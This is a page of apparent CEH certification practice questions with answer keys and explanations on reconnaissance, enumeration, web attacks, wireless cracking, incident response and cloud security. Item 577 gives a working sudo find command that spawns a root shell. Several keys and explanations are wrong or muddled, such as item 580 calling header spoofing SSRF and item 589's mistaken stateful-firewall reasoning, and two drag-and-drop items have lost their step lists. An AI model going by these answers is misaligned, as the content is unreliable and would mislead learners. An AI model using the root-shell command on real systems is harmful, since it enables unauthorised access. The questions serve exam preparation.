Which TWO of the following are passive reconnaissance techniques? (Select 2)

Select 2 answers
A.Performing a WHOIS lookup
B.Banner grabbing with Netcat
C.Running a TCP SYN scan with Nmap
D.Using Shodan to search for exposed devices
E.Performing a ping sweep
AnswersA, D

WHOIS queries public registration databases without sending traffic to the target's infrastructure.

Why this answer

A WHOIS lookup queries public databases (e.g., whois.arin.net) to retrieve registration details for domains or IP blocks, such as registrar, creation date, and administrative contacts. This is passive because it relies on publicly available information without sending any packets directly to the target system. The CEH defines passive reconnaissance as gathering data without interacting with the target's network or services.

Exam trap

EC-Council often tests the distinction between passive and active reconnaissance by including banner grabbing (which is active because it requires a direct connection) as a distractor, leading candidates to mistakenly classify it as passive since it only reads server responses.

576
Multi-Selectmedium

Which TWO of the following are passive reconnaissance techniques?

Select 2 answers
A.Ping sweep
B.Google hacking (dorking)
C.Nmap SYN scan
D.Banner grabbing with Netcat
E.WHOIS lookup
AnswersB, E

Google dorking uses search engines to find information passively.

Why this answer

Google hacking (dorking) is a passive reconnaissance technique because it involves using advanced search operators in Google to discover publicly indexed information about a target, such as exposed configuration files or login pages, without sending any packets directly to the target's systems. It relies entirely on the search engine's pre-existing index, making it undetectable and non-intrusive. This aligns with the CEH definition of passive reconnaissance, where no direct interaction with the target occurs.

Exam trap

The trap here is that candidates often confuse 'passive' with 'stealthy' and incorrectly classify techniques like banner grabbing or SYN scans as passive because they can be performed with minimal noise, but CEH strictly defines passive reconnaissance as having zero direct interaction with the target's systems.

577
MCQmedium

During a penetration test, a tester gains a low-privilege shell on a Linux server. The command `sudo -l` reveals that the user can run `/usr/bin/find` as root. Which technique can the tester use to escalate privileges?

A.Abuse the SUID bit on find
B.Use find with the -exec flag to spawn a shell
C.Exploit a kernel vulnerability
D.Run a buffer overflow on the find binary
AnswerB

Why this answer

The `find` command has a `-exec` option that can execute arbitrary commands. With sudo access, the tester can run `sudo find . -exec /bin/sh \;` to obtain a root shell.

578
MCQhard

A security team discovers that an S3 bucket configured for static website hosting is exposing sensitive documents. The bucket policy allows public read access. Which AWS misconfiguration is MOST likely present?

A.The bucket policy allows s3:GetObject for all principals
B.The bucket versioning is disabled
C.The bucket is not using server-side encryption
D.The bucket ACL grants write access to authenticated users
AnswerA

This grants public read access to all objects.

Why this answer

Public read access to the bucket and objects is the direct cause. Blocking public access would prevent this.

579
MCQhard

A security team discovers that their web application is vulnerable to a Server-Side Request Forgery (SSRF) attack. Which of the following is the MOST effective mitigation technique to prevent SSRF?

A.Implement a whitelist of allowed domains and IP addresses for outbound requests
B.Use input validation to block URLs containing '127.0.0.1' or 'localhost'
C.Implement CSRF tokens on all forms
D.Disable unnecessary HTTP methods on the web server
AnswerA

Whitelisting is a strong control that prevents the server from making requests to unapproved destinations.

Why this answer

Whitelisting allowed domains and IP addresses is the most effective SSRF mitigation because it restricts the server from making requests to arbitrary external or internal resources.

580
MCQhard

An attacker sends a request to a web server with the following header: X-Forwarded-For: 127.0.0.1. The server processes the request as if it came from localhost and grants administrative access. This is an example of:

A.HTTP request smuggling
B.IDOR (Insecure Direct Object Reference)
C.Clickjacking
D.Server-Side Request Forgery (SSRF)
AnswerD

SSRF can be exploited by spoofing internal IPs to bypass access controls.

Why this answer

The attacker manipulates the X-Forwarded-For header to spoof the client IP, which can lead to SSRF or IP-based access control bypass.

581
Multi-Selectmedium

Which TWO of the following are examples of social engineering attacks? (Select two)

Select 2 answers
A.Pharming
B.Pretexting
C.SYN flood
D.Brute force attack
E.Vishing
AnswersB, E

Pretexting involves creating a fabricated scenario to obtain information.

Why this answer

Pretexting and vishing are social engineering. Brute force and SYN flood are technical attacks. Pharming is a DNS attack.

582
MCQhard

During a penetration test, an analyst uses a tool that sends forged ARP replies to associate the attacker's MAC address with the IP address of the default gateway. This technique allows the attacker to intercept traffic. Which tool is commonly used for this purpose?

A.Ettercap
B.Wireshark
C.Nmap
D.tcpdump
AnswerA

Ettercap performs ARP poisoning and MITM attacks.

Why this answer

Ettercap is a comprehensive suite for man-in-the-middle attacks, including ARP poisoning.

583
Multi-Selectmedium

Which TWO of the following are symmetric encryption algorithms? (Select 2)

Select 2 answers
A.ECC
B.RSA
C.3DES
D.AES
E.MD5
AnswersC, D

3DES is a symmetric block cipher.

Why this answer

AES and 3DES are symmetric algorithms; RSA and ECC are asymmetric; MD5 is a hash function.

584
Multi-Selecteasy

Which TWO of the following are common tools used for SMB enumeration? (Select 2)

Select 2 answers
A.ldapsearch
B.snmpwalk
C.enum4linux
D.nbtstat
E.smbclient
AnswersC, E

enum4linux is a tool for enumerating information from Windows SMB systems.

Why this answer

enum4linux is a wrapper tool that leverages SMB/CIFS operations (via smbclient, rpcclient, and net) to enumerate user lists, share listings, OS information, and password policies from Windows and Samba targets. It directly queries the SMB protocol (port 445/139) and is a standard tool for SMB enumeration in penetration testing.

Exam trap

EC-Council often tests the distinction between tools that operate at different protocol layers—candidates confuse NetBIOS name resolution tools (nbtstat) with SMB enumeration tools, or mistake LDAP/SNMP tools for SMB-specific ones.

585
Drag & Dropmedium

Drag and drop the steps to perform a successful social engineering attack in a penetration test into the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

Research, craft pretext, choose channel, execute, document.

586
MCQmedium

A security analyst notices unusual outbound traffic from an internal server to a known malicious IP address on port 4444. The server is running a web application that was recently scanned using a vulnerability scanner. Which of the following is the MOST likely cause?

A.The server is performing a DNS lookup to resolve the malicious IP address
B.The web application is sending log data to a SIEM system for analysis
C.A vulnerability discovered during the scan was exploited, establishing a reverse shell connection to the attacker
D.The vulnerability scan caused a false positive and triggered a legitimate backup process
AnswerC

Port 4444 is commonly used for reverse shells. Outbound traffic to a malicious IP on this port indicates successful exploitation and a backdoor connection.

Why this answer

Option C is correct because outbound traffic on port 4444 from an internal server to a known malicious IP is a classic indicator of a reverse shell connection. A reverse shell is a common post-exploitation technique where an attacker forces the victim server to connect back to their listener, often on high ports like 4444, bypassing inbound firewall rules. The timing after a vulnerability scan strongly suggests that a discovered vulnerability (e.g., command injection, RCE) was exploited to establish this shell.

Exam trap

The trap here is that candidates may confuse reverse shells with normal outbound traffic like DNS or backups, failing to recognize that port 4444 is a well-known Metasploit default for reverse TCP payloads and that outbound connections to malicious IPs are a hallmark of compromise.

How to eliminate wrong answers

Option A is wrong because DNS lookups use UDP or TCP port 53, not port 4444, and are not directed to a malicious IP for resolution; they query a DNS server. Option B is wrong because SIEM log forwarding typically uses ports like 514 (syslog), 1514, or 443 (HTTPS), not port 4444, and would not target a known malicious IP. Option D is wrong because a legitimate backup process would use standard backup ports (e.g., 445 for SMB, 22 for SSH, or 443 for HTTPS) and would not connect to a known malicious IP; false positives from vulnerability scans do not trigger outbound connections to attacker-controlled hosts.

587
Drag & Dropmedium

Drag and drop the steps to set up a VPN using IPsec in tunnel mode into the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

IPsec setup: Phase 1, Phase 2, traffic selectors, apply policies, test.

588
MCQmedium

During a penetration test, you execute the command `enum4linux -a 192.168.1.20`. The output reveals that the 'backup' account has a blank password and belongs to the 'Domain Admins' group. Which phase of the CHPSET methodology does identifying this vulnerability belong to?

A.Privilege escalation
B.Cracking passwords
C.Spying
D.Executing applications
AnswerB

Discovering a blank password is essentially identifying a weak/absent password, falling under password cracking.

Why this answer

The command `enum4linux -a` enumerates SMB shares, users, and password policies from a Windows target. Discovering that the 'backup' account has a blank password directly identifies a weak or missing credential, which falls under the 'Cracking passwords' phase of the CHPSET methodology. This phase involves identifying and exploiting weak, default, or blank passwords to gain unauthorized access.

Exam trap

The trap here is confusing the 'Cracking passwords' phase with 'Privilege escalation' because discovering a blank password on a high-privilege account seems like a privilege escalation vector, but the CHPSET methodology defines password cracking as the phase where weak or blank credentials are identified and exploited.

How to eliminate wrong answers

Option A is wrong because privilege escalation occurs after initial access is obtained, not during the identification of a blank password vulnerability. Option C is wrong because spying refers to monitoring or eavesdropping on network traffic or user activity, not discovering account credentials. Option D is wrong because executing applications involves running tools or payloads to achieve a specific goal, whereas this step is about identifying a credential weakness.

589
MCQmedium

During a penetration test, you discover that an internal web server responds to ICMP echo requests but does not respond to TCP SYN scans on port 80. However, when you browse to the server's IP using a browser, the web page loads successfully. What is the most likely reason for this behavior?

A.A stateful firewall is blocking inbound SYN packets to port 80 but allowing responses to outbound connections.
B.The web server is running on a non-standard port that you did not scan.
C.The server's TCP/IP stack is misconfigured and does not respond to SYN scans.
D.A web application firewall is blocking the SYN scan traffic.
AnswerA

Stateful firewalls track connection states; they may block unsolicited SYN but allow replies.

Why this answer

A stateful firewall tracks the state of network connections. When you browse to the server, your browser initiates an outbound TCP connection, and the firewall allows the return SYN-ACK packets as part of the established session. However, a standalone TCP SYN scan sends unsolicited SYN packets to port 80, which the firewall sees as a new inbound connection attempt and blocks, preventing the server from responding.

The server's ICMP echo reply is allowed because ICMP is stateless and not typically filtered by the same rules.

Exam trap

The trap here is that candidates assume a server that responds to ICMP and serves web pages must be fully reachable on all ports, overlooking how stateful firewalls differentiate between unsolicited inbound SYN packets and responses to outbound connections.

How to eliminate wrong answers

Option B is wrong because the web page loads successfully when browsing, which confirms the server is listening on the standard port 80 (or a port your browser automatically uses). Option C is wrong because a misconfigured TCP/IP stack would also prevent the browser from loading the page, as the browser relies on the same TCP handshake. Option D is wrong because a web application firewall (WAF) operates at the application layer (HTTP/HTTPS) and would not block raw TCP SYN packets; it inspects HTTP payloads, not the initial handshake.

590
Multi-Selectmedium

A penetration tester is conducting DNS enumeration. Which TWO of the following tools are specifically designed for DNS enumeration? (Select two)

Select 2 answers
A.dnsrecon
B.theHarvester
C.Nmap
D.Maltego
E.dnsenum
AnswersA, E

dnsrecon is a DNS enumeration tool.

Why this answer

dnsrecon is a dedicated DNS enumeration tool that performs multiple types of DNS queries (e.g., SRV, MX, SOA, zone transfer attempts) and supports brute-force subdomain discovery. It is specifically designed to gather DNS records and identify misconfigurations, making it a primary tool for DNS enumeration.

Exam trap

The trap here is that candidates often confuse general-purpose reconnaissance tools (like theHarvester or Maltego) with dedicated DNS enumeration tools, or they assume Nmap's DNS scripts make it a primary DNS enumeration tool, when in fact the question specifically asks for tools 'designed for DNS enumeration'.

591
MCQmedium

Which of the following is a characteristic of a polymorphic virus?

A.It changes its code pattern every time it infects a new file or system.
B.It spreads through network shares without requiring user interaction.
C.It remains dormant until a specific date or time.
D.It infects the master boot record of a hard drive.
AnswerA

Polymorphic viruses use encryption or other techniques to change their signature while preserving functionality.

Why this answer

Polymorphic viruses mutate their code with each infection to evade signature-based detection, while often keeping the original functionality intact.

592
MCQmedium

A security team discovers that an attacker has been using steganography to exfiltrate data from the corporate network. The attacker hid data inside image files and uploaded them to a public image hosting site. Which of the following is the BEST method to detect this type of exfiltration?

A.Compare file hashes of uploaded images to known-good baselines
B.Deploy a steganography detection tool that analyzes image pixel patterns for statistical anomalies
C.Block all image uploads to external sites
D.Use network-based DLP to inspect image file headers for hidden data
AnswerB

Steganalysis tools look for statistical irregularities introduced by data embedding.

Why this answer

Steganography detection often involves statistical analysis of image files to identify anomalies. Advanced persistent threat (APT) detection systems may use machine learning to detect steganographic content.

593
MCQmedium

During a wireless penetration test, a tester captures the 4-way handshake between a client and WPA2-PSK access point. Which tool would the tester MOST likely use to attempt to recover the pre-shared key?

A.Aircrack-ng
B.Wireshark
C.Kismet
D.Reaver
AnswerA

Aircrack-ng uses captured handshakes to perform dictionary attacks against WPA/WPA2 PSK.

Why this answer

The correct tool is aircrack-ng, which is specifically designed to crack WPA/WPA2 PSK by performing dictionary attacks on captured handshakes. It is part of the aircrack-ng suite widely used for wireless security auditing.

594
MCQhard

You are a security analyst at a financial institution. The SOC has detected anomalous outbound traffic from a server in the DMZ to an unknown IP address on TCP port 8443. The server runs a custom application that normally communicates with internal databases on port 1433. The server's OS is Windows Server 2019. Preliminary analysis shows that a new service named 'UpdateSvc' was installed three days ago, set to start automatically, and runs under the LocalSystem account. The service binary is located at C:\Windows\System32\svchost.exe (the legitimate one). However, the service's 'ImagePath' registry key points to 'C:\Windows\System32\svchost.exe -k UpdateSvc'. Additionally, a scheduled task named 'HealthCheck' runs every hour and executes 'powershell.exe -EncodedCommand <base64>'. The encoded command decodes to a script that downloads a payload from the same unknown IP on port 8443 and executes it in memory. The server has antivirus installed that detected nothing. As the analyst, which of the following is the BEST immediate course of action?

A.Reimage the server immediately to ensure the malware is completely removed.
B.Uninstall the current antivirus and install a different endpoint protection solution, then perform a full scan.
C.Delete the 'UpdateSvc' service and the 'HealthCheck' scheduled task, then run a full antivirus scan.
D.Isolate the server from the network by disconnecting the network cable and blocking the IP at the firewall, then initiate incident response procedures.
AnswerD

Isolation stops the attack and preserves evidence for investigation.

Why this answer

Option D is correct because the immediate priority is to contain the threat by isolating the compromised server from the network (disconnecting the cable) and blocking the command-and-control IP at the firewall. This stops the ongoing outbound communication on TCP port 8443 and prevents further payload downloads or data exfiltration. Initiating incident response procedures ensures proper forensic collection and analysis, which is critical before any remediation steps like reimaging or deleting artifacts.

Exam trap

The trap here is that candidates focus on removing the malware artifacts (service and task) rather than containing the threat first, which is a fundamental incident response principle: isolate before eradicate.

How to eliminate wrong answers

Option A is wrong because reimaging the server immediately destroys volatile evidence (e.g., memory, running processes, network connections) that is essential for understanding the attack vector and scope. Option B is wrong because changing antivirus software mid-incident wastes time and does not address the active compromise; the malware is already evading detection via fileless execution (PowerShell in memory), so a scan is unlikely to find it. Option C is wrong because deleting the service and scheduled task without first isolating the server allows the attacker to reinstall them or escalate privileges, and the malware may have persistence mechanisms beyond these two artifacts.

595
Multi-Selecthard

A security analyst is investigating a potential container escape in a Kubernetes cluster. Which THREE of the following are common indicators of a container escape?

Select 3 answers
A.A process running inside the container with CAP_SYS_ADMIN capability
B.The container is running in privileged mode
C.The container is using a hostPath volume that mounts the host's /var/run/docker.sock
D.The container has a read-only root filesystem
E.The container is running as a non-root user
AnswersA, B, C

Correct: CAP_SYS_ADMIN grants many privileges that can be used to escape.

Why this answer

Container escape often involves breaking out of the container's isolation by exploiting misconfigurations or vulnerabilities. These indicators are common.

596
MCQmedium

A security analyst reviews a sandbox report for a suspicious executable. The report shows that the executable modified the Windows registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to add a new entry pointing to itself. This action is characteristic of which type of malware?

A.Logic bomb
B.Backdoor Trojan
C.Ransomware
D.Adware
AnswerB

Backdoor Trojans commonly use registry run keys for persistence.

Why this answer

A backdoor Trojan often persists by adding itself to startup registry keys to maintain access. The other options are incorrect: logic bombs activate under specific conditions, adware displays ads, and ransomware typically demands payment.

597
MCQeasy

During a penetration test, a tester wants to gather email addresses, subdomains, and employee names associated with a target domain. Which of the following tools is specifically designed for such passive reconnaissance?

A.Wireshark
B.theHarvester
C.Metasploit
D.Nmap
AnswerB

theHarvester performs passive reconnaissance by querying public sources for emails, subdomains, and other information.

Why this answer

theHarvester is a passive reconnaissance tool specifically designed to gather email addresses, subdomains, employee names, and other open-source intelligence (OSINT) from public sources such as search engines (Google, Bing), PGP key servers, and the Shodan database. It operates without sending direct packets to the target, making it ideal for passive footprinting as defined in the CEH methodology.

Exam trap

EC-Council often tests the distinction between passive and active reconnaissance, and the trap here is that candidates confuse theHarvester with active tools like Nmap or Wireshark because they all involve network data, but only theHarvester gathers OSINT from third-party public sources without sending packets to the target.

How to eliminate wrong answers

Option A is wrong because Wireshark is a network protocol analyzer that captures and inspects live traffic in real time, which is an active sniffing technique requiring interaction with the network, not a passive reconnaissance tool for gathering OSINT from public sources. Option C is wrong because Metasploit is an exploitation framework used for developing and executing active exploits against vulnerabilities, not for passive information gathering like email or subdomain enumeration. Option D is wrong because Nmap is an active scanning tool that sends crafted packets (e.g., SYN, ICMP) to discover hosts and services, which generates network traffic and is not passive reconnaissance.

598
Multi-Selecthard

Which THREE of the following are valid methods for exploiting cloud misconfigurations? (Select 3)

Select 3 answers
A.Using a container escape to access the host OS
B.Exploiting an S3 bucket with public read access to download sensitive files
C.Performing a SQL injection on a web application
D.Launching a DDoS attack from a botnet
E.Abusing overly permissive IAM roles to escalate privileges
AnswersA, B, E

Container escape is a cloud infrastructure misconfiguration.

Why this answer

S3 bucket public read access, overly permissive IAM roles, and container escape are all cloud misconfiguration exploitation vectors. SQL injection is a web app vulnerability, not cloud-specific. DDoS is an attack type, not a misconfiguration.

599
MCQmedium

A security analyst runs the command 'tcpdump -i eth0 -n host 10.0.0.5 and port 80' and sees many packets with the SYN flag set but no corresponding ACK. Which attack is likely occurring?

A.SYN flood
B.ICMP flood
C.UDP flood
D.Ping of Death
AnswerA

SYN flood sends many TCP SYN packets without completing the handshake, causing half-open connections.

Why this answer

The TCP three-way handshake involves SYN, SYN-ACK, ACK. Seeing only SYN packets without ACK responses indicates a SYN flood attack, where the attacker sends many SYN packets without completing the handshake to exhaust server resources.

600
MCQeasy

Which of the following tools is specifically designed for assessing the security of AWS environments by checking for misconfigurations in services like S3, IAM, and EC2?

A.ScoutSuite
B.Aircrack-ng
C.Nmap
D.Wireshark
AnswerA

Correct. ScoutSuite audits AWS, Azure, and GCP for security misconfigurations.

Why this answer

ScoutSuite is an open-source security auditing tool for cloud environments, including AWS. It checks for misconfigurations across multiple services and provides a detailed report.

Page 7

Page 8 of 14

Page 9